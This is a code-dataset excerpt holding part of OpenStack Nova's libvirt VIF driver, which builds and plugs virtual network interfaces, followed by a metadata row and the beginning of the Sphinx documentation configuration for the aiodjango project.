network_model.VIF_MODEL_PCNET,
network_model.VIF_MODEL_RTL8139,
network_model.VIF_MODEL_E1000,
network_model.VIF_MODEL_SPAPR_VLAN],
'xen': [network_model.VIF_MODEL_NETFRONT,
network_model.VIF_MODEL_NE2K_PCI,
network_model.VIF_MODEL_PCNET,
network_model.VIF_MODEL_RTL8139,
network_model.VIF_MODEL_E1000],
'lxc': [],
'uml': [],
'parallels': [network_model.VIF_MODEL_VIRTIO,
network_model.VIF_MODEL_RTL8139,
network_model.VIF_MODEL_E1000],
}
if vif_model is None:
return True
if virt_type not in valid_models:
raise exception.UnsupportedVirtType(virt=virt_type)
return vif_model in valid_models[virt_type]
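# Example (doctest-style sketch of the check above):
#
#   >>> is_vif_model_valid_for_virt('kvm', network_model.VIF_MODEL_VIRTIO)
#   True
#   >>> is_vif_model_valid_for_virt('lxc', network_model.VIF_MODEL_VIRTIO)
#   False
#   >>> is_vif_model_valid_for_virt('kvm', None)   # let libvirt choose
#   True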
@profiler.trace_cls("vif_driver")
class LibvirtGenericVIFDriver(object):
"""Generic VIF driver for libvirt networking."""
def _normalize_vif_type(self, vif_type):
return vif_type.replace('2.1q', '2q')
def get_vif_devname(self, vif):
if 'devname' in vif:
return vif['devname']
return ("nic" + vif['id'])[:network_model.NIC_NAME_LEN]
def get_vif_devname_with_prefix(self, vif, prefix):
devname = self.get_vif_devname(vif)
return prefix + devname[3:]
def get_base_config(self, instance, mac, image_meta,
inst_type, virt_type, vnic_type, host):
# TODO(sahid): We should rewrite it. This method handles too
# many unrelated things. We probably need to have a specific
# virtio, vhost, vhostuser functions.
conf = vconfig.LibvirtConfigGuestInterface()
# Default to letting libvirt / the hypervisor choose the model
model = None
driver = None
vhost_queues = None
# If the user has specified a 'vif_model' against the
# image then honour that model
if image_meta:
model = osinfo.HardwareProperties(image_meta).network_model
# Else if the virt type is KVM/QEMU/VZ(Parallels), then use virtio
# according to the global config parameter
if (model is None and
virt_type in ('kvm', 'qemu', 'parallels') and
CONF.libvirt.use_virtio_for_bridges):
model = network_model.VIF_MODEL_VIRTIO
# Workaround libvirt bug, where it mistakenly
# enables vhost mode, even for non-KVM guests
if (model == network_model.VIF_MODEL_VIRTIO and
virt_type == "qemu"):
driver = "qemu"
if not is_vif_model_valid_for_virt(virt_type,
model):
raise exception.UnsupportedHardware(model=model,
virt=virt_type)
if (virt_type in ('kvm', 'parallels') and
model == network_model.VIF_MODEL_VIRTIO and
vnic_type not in network_model.VNIC_TYPES_SRIOV):
vhost_drv, vhost_queues = self._get_virtio_mq_settings(image_meta,
inst_type)
# TODO(sahid): It seems that we return driver 'vhost' even
# for vhostuser interface where for vhostuser interface
# the driver should be 'vhost-user'. That currently does
# not create any issue since QEMU ignores the driver
# argument for vhostuser interface but we should probably
# fix that anyway. Also we should enforce that the driver
# use vhost and not None.
driver = vhost_drv or driver
rx_queue_size = None
if driver == 'vhost' or driver is None:
# vhost backend only supports update of RX queue size
rx_queue_size, _ = self._get_virtio_queue_sizes(host)
if rx_queue_size:
# TODO(sahid): Specifically force driver to be vhost
# that because if None we don't generate the XML
# driver element needed to set the queue size
# attribute. This can be removed when get_base_config
# will be fixed and rewrite to set the correct
# backend.
driver = 'vhost'
designer.set_vif_guest_frontend_config(
conf, mac, model, driver, vhost_queues, rx_queue_size)
return conf
def get_base_hostdev_pci_config(self, vif):
conf = vconfig.LibvirtConfigGuestHostdevPCI()
pci_slot = vif['profile']['pci_slot']
designer.set_vif_host_backend_hostdev_pci_config(conf, pci_slot)
return conf
def _is_multiqueue_enabled(self, image_meta, flavor):
_, vhost_queues = self._get_virtio_mq_settings(image_meta, flavor)
return vhost_queues > 1 if vhost_queues is not None else False
def _get_virtio_mq_settings(self, image_meta, flavor):
"""A methods to set the number of virtio queues,
if it has been requested in extra specs.
"""
driver = None
vhost_queues = None
if not isinstance(image_meta, objects.ImageMeta):
image_meta = objects.ImageMeta.from_dict(image_meta)
img_props = image_meta.properties
if img_props.get('hw_vif_multiqueue_enabled'):
driver = 'vhost'
max_tap_queues = self._get_max_tap_queues()
if max_tap_queues:
vhost_queues = (max_tap_queues if flavor.vcpus > max_tap_queues
else flavor.vcpus)
else:
vhost_queues = flavor.vcpus
return (driver, vhost_queues)
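    # Worked example (hedged; the flavor and image values are illustrative):
    # with 'hw_vif_multiqueue_enabled' set in the image properties, a
    # 16-vCPU flavor on a 3.x kernel (max 8 tap queues) yields
    # ('vhost', 8), while the same flavor on a 4.x kernel (max 256)
    # yields ('vhost', 16).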
def _get_max_tap_queues(self):
# NOTE(kengo.sakai): In kernels prior to 3.0,
# multiple queues on a tap interface is not supported.
# In kernels 3.x, the number of queues on a tap interface
# is limited to 8. From 4.0, the number is 256.
# See: https://bugs.launchpad.net/nova/+bug/1570631
kernel_version = int(os.uname()[2].split(".")[0])
if kernel_version <= 2:
return 1
elif kernel_version == 3:
return 8
elif kernel_version == 4:
return 256
else:
return None
def get_bridge_name(self, vif):
return vif['network']['bridge']
def get_ovs_interfaceid(self, vif):
return vif.get('ovs_interfaceid') or vif['id']
def get_veth_pair_names(self, iface_id):
return (("qvb%s" % iface_id)[:network_model.NIC_NAME_LEN],
("qvo%s" % iface_id)[:network_model.NIC_NAME_LEN])
@staticmethod
def is_no_op_firewall():
return CONF.firewall_driver == "nova.virt.firewall.NoopFirewallDriver"
def get_firewall_required_os_vif(self, vif):
if vif.has_traffic_filtering:
return False
if self.is_no_op_firewall():
return False
return True
def get_config_802qbg(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
params = vif["qbg_params"]
designer.set_vif_host_backend_802qbg_config(
conf, vif['network'].get_meta('interface'),
params['managerid'],
params['typeid'],
params['typeidversion'],
params['instanceid'])
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_802qbh(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
profile = vif["profile"]
vif_details = vif["details"]
net_type = 'direct'
if vif['vnic_type'] == network_model.VNIC_TYPE_DIRECT:
net_type = 'hostdev'
designer.set_vif_host_backend_802qbh_config(
conf, net_type, profile['pci_slot'],
vif_details[network_model.VIF_DETAILS_PROFILEID])
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_hw_veb(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
profile = vif["profile"]
vif_details = vif["details"]
net_type = 'direct'
if vif['vnic_type'] == network_model.VNIC_TYPE_DIRECT:
net_type = 'hostdev'
designer.set_vif_host_backend_hw_veb(
conf, net_type, profile['pci_slot'],
vif_details[network_model.VIF_DETAILS_VLAN])
# NOTE(vladikr): Not setting vlan tags for macvtap on SR-IOV VFs
# as vlan tag is not supported in Libvirt until version 1.3.5
if (vif['vnic_type'] == network_model.VNIC_TYPE_MACVTAP and not
host.has_min_version(MIN_LIBVIRT_MACVTAP_PASSTHROUGH_VLAN)):
conf.vlan = None
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_hostdev_physical(self, instance, vif, image_meta,
inst_type, virt_type, host):
return self.get_base_hostdev_pci_config(vif)
def get_config_macvtap(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
vif_details = vif['details']
macvtap_src = vif_details.get(network_model.VIF_DETAILS_MACVTAP_SOURCE)
macvtap_mode = vif_details.get(network_model.VIF_DETAILS_MACVTAP_MODE)
phys_interface = vif_details.get(
network_model.VIF_DETAILS_PHYS_INTERFACE)
missing_params = []
if macvtap_src is None:
missing_params.append(network_model.VIF_DETAILS_MACVTAP_SOURCE)
if macvtap_mode is None:
missing_params.append(network_model.VIF_DETAILS_MACVTAP_MODE)
if phys_interface is None:
missing_params.append(network_model.VIF_DETAILS_PHYS_INTERFACE)
if len(missing_params) > 0:
raise exception.VifDetailsMissingMacvtapParameters(
vif_id=vif['id'],
missing_params=missing_params)
designer.set_vif_host_backend_direct_config(
conf, macvtap_src, macvtap_mode)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_iovisor(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev, host)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_midonet(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev, host)
return conf
def get_config_tap(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev, host)
return conf
def _get_vhostuser_settings(self, vif):
vif_details = vif['details']
mode = vif_details.get(network_model.VIF_DETAILS_VHOSTUSER_MODE,
'server')
sock_path = vif_details.get(network_model.VIF_DETAILS_VHOSTUSER_SOCKET)
if sock_path is None:
raise exception.VifDetailsMissingVhostuserSockPath(
vif_id=vif['id'])
return mode, sock_path
def get_config_vhostuser(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
# TODO(sahid): We should never configure a driver backend for
# vhostuser interface. Specifically override driver to use
# None. This can be removed when get_base_config will be fixed
# and rewrite to set the correct backend.
conf.driver_name = None
mode, sock_path = self._get_vhostuser_settings(vif)
rx_queue_size, tx_queue_size = self._get_virtio_queue_sizes(host)
designer.set_vif_host_backend_vhostuser_config(
conf, mode, sock_path, rx_queue_size, tx_queue_size)
# (vladikr) Not setting up driver and queues for vhostuser
# as queues are not supported in Libvirt until version 1.2.17
if not host.has_min_version(MIN_LIBVIRT_VHOSTUSER_MQ):
LOG.debug('Queues are not a vhostuser supported feature.')
conf.vhost_queues = None
return conf
def _get_virtio_queue_sizes(self, host):
"""Returns rx/tx queue sizes configured or (None, None)
Based on tx/rx queue sizes configured on host (nova.conf). The
        method checks whether the versions of libvirt and QEMU are
        correct.
"""
# TODO(sahid): For vhostuser interface this function is called
        # from get_base_config and also from the method responsible for
        # configuring the vhostuser interface, meaning that the logs can be
# duplicated. In future we want to rewrite get_base_config.
rx, tx = CONF.libvirt.rx_queue_size, CONF.libvirt.tx_queue_size
if rx and not host.has_min_version(
MIN_LIBVIRT_RX_QUEUE_SIZE, MIN_QEMU_RX_QUEUE_SIZE):
LOG.warning('Setting RX queue size requires libvirt %s and QEMU '
'%s version or greater.',
libvirt_utils.version_to_string(
MIN_LIBVIRT_RX_QUEUE_SIZE),
libvirt_utils.version_to_string(
MIN_QEMU_RX_QUEUE_SIZE))
rx = None
if tx and not host.has_min_version(
MIN_LIBVIRT_TX_QUEUE_SIZE, MIN_QEMU_TX_QUEUE_SIZE):
LOG.warning('Setting TX queue size requires libvirt %s and QEMU '
'%s version or greater.',
libvirt_utils.version_to_string(
MIN_LIBVIRT_TX_QUEUE_SIZE),
libvirt_utils.version_to_string(
MIN_QEMU_TX_QUEUE_SIZE))
tx = None
return rx, tx
def get_config_ib_hostdev(self, instance, vif, image_meta,
inst_type, virt_type, host):
return self.get_base_hostdev_pci_config(vif)
def get_config_vrouter(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif['address'], image_meta,
inst_type, virt_type, vif['vnic_type'],
host)
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev, host)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def _set_config_VIFGeneric(self, instance, vif, conf, host):
dev = self.get_vif_devname(vif)
designer.set_vif_host_backend_ethernet_config(conf, dev, host)
def _set_config_VIFBridge(self, instance, vif, conf, host=None):
conf.net_type = "bridge"
conf.source_dev = vif.bridge_name
conf.target_dev = vif.vif_name
if self.get_firewall_required_os_vif(vif):
mac_id = vif.address.replace(':', '')
name = "nova-instance-" + instance.name + "-" + mac_id
conf.filtername = name
def _set_config_VIFOpenVSwitch(self, instance, vif, conf, host=None):
conf.net_type = "bridge"
conf.source_dev = vif.bridge_name
conf.target_dev = vif.vif_name
self._set_config_VIFPortProfile(instance, vif, conf)
def _set_config_VIFVHostUser(self, instance, vif, conf, host=None):
# TODO(sahid): We should never configure a driver backend for
# vhostuser interface. Specifically override driver to use
# None. This can be removed when get_base_config will be fixed
# and rewrite to set the correct backend.
conf.driver_name = None
rx_queue_size, tx_queue_size = self._get_virtio_queue_sizes(host)
designer.set_vif_host_backend_vhostuser_config(
conf, vif.mode, vif.path, rx_queue_size, tx_queue_size)
if not host.has_min_version(MIN_LIBVIRT_VHOSTUSER_MQ):
LOG.debug('Queues are not a vhostuser supported feature.')
conf.vhost_queues = None
def _set_config_VIFHostDevice(self, instance, vif, conf, host=None):
if vif.dev_type == osv_fields.VIFHostDeviceDevType.ETHERNET:
# This sets the required fields for an <interface type='hostdev'>
# section in a libvirt domain (by using a subset of hw_veb's
# options).
designer.set_vif_host_backend_hw_veb(
conf, 'hostdev', vif.dev_address, None)
else:
# TODO(jangutter): dev_type == VIFHostDeviceDevType.GENERIC
# is currently unsupported under os-vif. The corresponding conf
# class would be: LibvirtConfigGuestHostdevPCI
# but os-vif only returns a LibvirtConfigGuestInterface object
raise exception.InternalError(
_("Unsupported os-vif VIFHostDevice dev_type %(type)s") %
{'type': vif.dev_type})
def _set_config_VIFPortProfileOpenVSwitch(self, profile, conf):
conf.vporttype = "openvswitch"
conf.add_vport_param("interfaceid",
profile.interface_id)
def _set_config_VIFPortProfile(self, instance, vif, conf):
# Set any port profile that may be required
profilefunc = "_set_config_" + vif.port_profile.obj_name()
func = getattr(self, profilefunc, None)
if not func:
raise exception.InternalError(
_("Unsupported VIF port profile type %(obj)s func %(func)s") %
{'obj': vif.port_profile.obj_name(), 'func': profilefunc})
func(vif.port_profile, conf)
def _get_config_os_vif(self, instance, vif, image_meta, inst_type,
virt_type, host, vnic_type):
"""Get the domain config for a VIF
:param instance: nova.objects.Instance
:param vif: os_vif.objects.vif.VIFBase subclass
:param image_meta: nova.objects.ImageMeta
:param inst_type: nova.objects.Flavor
:param virt_type: virtualization type
:param host: nova.virt.libvirt.host.Host
:param vnic_type: vnic type
:returns: nova.virt.libvirt.config.LibvirtConfigGuestInterface
"""
# Do the config that's common to all vif types
conf = self.get_base_config(instance, vif.address, image_meta,
inst_type, virt_type, vnic_type,
host)
# Do the VIF type specific config
viffunc = "_set_config_" + vif.obj_name()
func = getattr(self, viffunc, None)
if not func:
raise exception.InternalError(
_("Unsupported VIF type %(obj)s func %(func)s") %
{'obj': vif.obj_name(), 'func': viffunc})
func(instance, vif, conf, host)
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config(self, instance, vif, image_meta,
inst_type, virt_type, host):
vif_type = vif['type']
vnic_type = vif['vnic_type']
# instance.display_name could be unicode
instance_repr = utils.get_obj_repr_unicode(instance)
LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
'vif=%(vif)s virt_type=%(virt_type)s',
{'vif_type': vif_type, 'instance': instance_repr,
'vif': vif, 'virt_type': virt_type})
if vif_type is None:
raise exception.InternalError(
_("vif_type parameter must be present "
"for this vif_driver implementation"))
# Try os-vif codepath first
vif_obj = os_vif_util.nova_to_osvif_vif(vif)
if vif_obj is not None:
return self._get_config_os_vif(instance, vif_obj, image_meta,
inst_type, virt_type, host,
vnic_type)
# Legacy non-os-vif codepath
vif_slug = self._normalize_vif_type(vif_type)
func = getattr(self, 'get_config_%s' % vif_slug, None)
if not func:
raise exception.InternalError(
_("Unexpected vif_type=%s") % vif_type)
return func(instance, vif, image_meta,
inst_type, virt_type, host)
def plug_ib_hostdev(self, instance, vif):
fabric = vif.get_physical_network()
if not fabric:
raise exception.NetworkMissingPhysicalNetwork(
network_uuid=vif['network']['id']
)
pci_slot = vif['profile']['pci_slot']
device_id = instance['uuid']
vnic_mac = vif['address']
try:
nova.privsep.libvirt.plug_infiniband_vif(
vnic_mac, device_id, fabric,
network_model.VIF_TYPE_IB_HOSTDEV, pci_slot)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while plugging ib hostdev vif"),
instance=instance)
def plug_802qbg(self, instance, vif):
pass
def plug_802qbh(self, instance, vif):
pass
def plug_hw_veb(self, instance, vif):
# TODO(vladikr): This code can be removed once the minimum version of
        # Libvirt is increased above 1.3.5, as vlan will be set by libvirt
if vif['vnic_type'] == network_model.VNIC_TYPE_MACVTAP:
linux_net_utils.set_vf_interface_vlan(
vif['profile']['pci_slot'],
mac_addr=vif['address'],
vlan=vif['details'][network_model.VIF_DETAILS_VLAN])
def plug_hostdev_physical(self, instance, vif):
pass
def plug_macvtap(self, instance, vif):
vif_details = vif['details']
vlan = vif_details.get(network_model.VIF_DETAILS_VLAN)
if vlan:
vlan_name = vif_details.get(
network_model.VIF_DETAILS_MACVTAP_SOURCE)
phys_if = vif_details.get(network_model.VIF_DETAILS_PHYS_INTERFACE)
linux_net.LinuxBridgeInterfaceDriver.ensure_vlan(
vlan, phys_if, interface=vlan_name)
def plug_midonet(self, instance, vif):
"""Plug into MidoNet's network port
Bind the vif to a MidoNet virtual port.
"""
dev = self.get_vif_devname(vif)
port_id = vif['id']
try:
linux_net_utils.create_tap_dev(dev)
nova.privsep.libvirt.plug_midonet_vif(port_id, dev)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while plugging vif"), instance=instance)
def plug_iovisor(self, instance, vif):
"""Plug using PLUMgrid IO Visor Driver
        Connect a network device to its respective
        Virtual Domain in the PLUMgrid Platform.
"""
dev = self.get_vif_devname(vif)
iface_id = vif['id']
linux_net_utils.create_tap_dev(dev)
net_id = vif['network']['id']
tenant_id = instance.project_id
try:
nova.privsep.libvirt.plug_plumgrid_vif(
dev, iface_id, vif['address'], net_id, tenant_id)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while plugging vif"), instance=instance)
def plug_tap(self, instance, vif):
"""Plug a VIF_TYPE_TAP virtual interface."""
dev = self.get_vif_devname(vif)
mac = vif['details'].get(network_model.VIF_DETAILS_TAP_MAC_ADDRESS)
linux_net_utils.create_tap_dev(dev, mac)
network = vif.get('network')
mtu = network.get_meta('mtu') if network else None
linux_net_utils.set_device_mtu(dev, mtu)
def plug_vhostuser(self, instance, vif):
pass
def plug_vrouter(self, instance, vif):
"""Plug into Contrail's network port
Bind the vif to a Contrail virtual port.
"""
dev = self.get_vif_devname(vif)
ip_addr = '0.0.0.0'
ip6_addr = None
subnets = vif['network']['subnets']
for subnet in subnets:
if not subnet['ips']:
continue
ips = subnet['ips'][0]
if not ips['address']:
continue
            if ips['version'] == 4:
                ip_addr = ips['address']
            elif ips['version'] == 6:
                ip6_addr = ips['address']
ptype = 'NovaVMPort'
        if CONF.libvirt.virt_type == 'lxc':
ptype = 'NameSpacePort'
try:
multiqueue = self._is_multiqueue_enabled(instance.image_meta,
instance.flavor)
linux_net_utils.create_tap_dev(dev, multiqueue=multiqueue)
nova.privsep.libvirt.plug_contrail_vif(
instance.project_id,
instance.uuid,
instance.display_name,
vif['id'],
vif['network']['id'],
ptype,
dev,
vif['address'],
ip_addr,
ip6_addr,
)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while plugging vif"), instance=instance)
def _plug_os_vif(self, instance, vif):
instance_info = os_vif_util.nova_to_osvif_instance(instance)
try:
os_vif.plug(vif, instance_info)
except osv_exception.ExceptionBase as ex:
msg = (_("Failure running os_vif plugin plug method: %(ex)s")
% {'ex': ex})
raise exception.InternalError(msg)
def plug(self, instance, vif):
vif_type = vif['type']
# instance.display_name could be unicode
instance_repr = utils.get_obj_repr_unicode(instance)
LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
'vif=%(vif)s',
{'vif_type': vif_type, 'instance': instance_repr,
'vif': vif})
if vif_type is None:
raise exception.VirtualInterfacePlugException(
_("vif_type parameter must be present "
"for this vif_driver implementation"))
# Try os-vif codepath first
vif_obj = os_vif_util.nova_to_osvif_vif(vif)
if vif_obj is not None:
self._plug_os_vif(instance, vif_obj)
return
# Legacy non-os-vif codepath
vif_slug = self._normalize_vif_type(vif_type)
func = getattr(self, 'plug_%s' % vif_slug, None)
if not func:
raise exception.VirtualInterfacePlugException(
_("Plug vif failed because of unexpected "
"vif_type=%s") % vif_type)
func(instance, vif)
def unplug_ib_hostdev(self, instance, vif):
fabric = vif.get_physical_network()
if not fabric:
raise exception.NetworkMissingPhysicalNetwork(
network_uuid=vif['network']['id']
)
vnic_mac = vif['address']
try:
nova.privsep.libvirt.unplug_infiniband_vif(fabric, vnic_mac)
except Exception:
LOG.exception(_("Failed while unplugging ib hostdev vif"))
def unplug_802qbg(self, instance, vif):
pass
def unplug_802qbh(self, instance, vif):
pass
def unplug_hw_veb(self, instance, vif):
# TODO(vladikr): This code can be removed once the minimum version of
        # Libvirt is increased above 1.3.5, as vlan will be set by libvirt
if vif['vnic_type'] == network_model.VNIC_TYPE_MACVTAP:
# The ip utility doesn't accept the MAC 00:00:00:00:00:00.
# Therefore, keep the MAC unchanged. Later operations on
# the same VF will not be affected by the existing MAC.
linux_net_utils.set_vf_interface_vlan(vif['profile']['pci_slot'],
mac_addr=vif['address'])
def unplug_hostdev_physical(self, instance, vif):
pass
def unplug_macvtap(self, instance, vif):
pass
def unplug_midonet(self, instance, vif):
"""Unplug from MidoNet network port
Unbind the vif from a MidoNet virtual port.
"""
dev = self.get_vif_devname(vif)
port_id = vif['id']
try:
nova.privsep.libvirt.unplug_midonet_vif(port_id)
linux_net_utils.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
def unplug_tap(self, instance, vif):
"""Unplug a VIF_TYPE_TAP virtual interface."""
dev = self.get_vif_devname(vif)
try:
linux_net_utils.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
def unplug_iovisor(self, instance, vif):
"""Unplug using PLUMgrid IO Visor Driver
        Delete the network device and its respective
        connection to the Virtual Domain in the PLUMgrid Platform.
"""
dev = self.get_vif_devname(vif)
try:
nova.privsep.libvirt.unplug_plumgrid_vif(dev)
linux_net_utils.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
def unplug_vhostuser(self, instance, vif):
pass
def unplug_vrouter(self, instance, vif):
"""Unplug Contrail's network port
Unbind the vif from a Contrail virtual port.
"""
dev = self.get_vif_devname(vif)
port_id = vif['id']
try:
nova.privsep.libvirt.unplug_contrail_vif(port_id)
linux_net_utils.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
def _unplug_os_vif(self, instance, vif):
instance_info = os_vif_util.nova_to_osvif_instance(instance)
try:
os_vif.unplug(vif, instance_info)
except osv_exception.ExceptionBase as ex:
msg = (_("Failure running os_vif plugin unplug method: %(ex)s")
% {'ex': ex})
raise exception.InternalError(msg)
def unplug(self, instance, vif):
vif_type = vif['type']
# instance.display_name could be unicode
instance_repr = utils.get_obj_repr_unicode(instance)
LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
'vif=%(vif)s',
{'vif_type': vif_type, 'instance': instance_repr,
'vif': vif})
if vif_type is None:
msg = _("vif_type parameter must be present for this vif_driver "
"implementation")
raise exception.InternalError(msg)
# Try os-vif codepath first
vif_obj = os_vif_util.nova_to_osvif_vif(vif)
if vif_obj is not None:
self._unplug_os_vif(instance, vif_obj)
return
# Legacy non-os-vif codepath
vif_slug = self._normalize_vif_type(vif_type)
func = getattr(self, 'unplug_%s' % vif_slug, None)
if not func:
msg = _("Unexpected vif_type=%s") % vif_type
raise exception.InternalError(msg)
func(instance, vif)
| apache-2.0 | 647,109,165,761,221,000 | 39.181511 | 79 | 0.577649 | false |
mlavin/aiodjango | docs/conf.py | 1 | 9308 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# aiodjango documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 22 08:33:47 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import datetime
import sys
import os
import shlex
import aiodjango
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'aiodjango'
copyright = '%s, Mark Lavin' % datetime.date.today().year
author = 'Mark Lavin'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '.'.join(aiodjango.__version__.split('.')[0:2])
# The full version, including alpha/beta/rc tags.
release = aiodjango.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'aiodjangodoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'aiodjango.tex', 'aiodjango Documentation',
'Mark Lavin', 'manual'),
]
